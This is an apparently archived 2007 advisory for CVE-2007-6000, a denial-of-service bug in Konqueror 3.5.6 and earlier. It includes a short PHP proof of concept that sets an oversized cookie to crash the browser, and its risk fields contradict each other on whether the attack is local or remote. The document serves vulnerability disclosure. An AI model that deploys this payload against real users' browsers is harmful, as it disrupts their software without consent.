Konqueror Remote Denial Of Service

2007.11.16

Credit: laurent gaffie

Risk: Medium

Local: Yes

Remote: No

CVE: CVE-2007-6000

CWE: CWE-399

CVSS Base Score: 5/10

Impact Subscore: 2.9/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: None

Integrity impact: None

Availability impact: Partial

Application: Konqueror <= 3.5.6

Web Site: http://www.konqueror.org/

Platform: Unix

Bug: Remote Denial of service

-------------------------------------------------------

1) Introduction

2) Bug

3) Proof of concept

4) Greets

5) Credits

===========

1) Introduction

===========

"Konqueror is an Open Source web browser with HTML 4.01 compliance, supporting Java applets, JavaScript, CSS 1, CSS 2.1, as well as Netscape plugins (for example, Flash or RealVideo plugins)."

======

2) Bug

======

Konqueror doesn't handle big cookies, so when a big cookie is sended , konqueror will crash.

=====

3)Proof of concept

=====

Proof of concept example :

<?php

ini_set("memory_limit","200M");

setcookie("hi_fox", str_repeat("A",19999999));

?>

========

4)Greets

========

Berga,team soh, #futurezone, #soh

=====

5)Credits

=====

laurent gaffi

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

Konqueror Remote Denial Of Service

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Konqueror Remote Denial Of Service

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.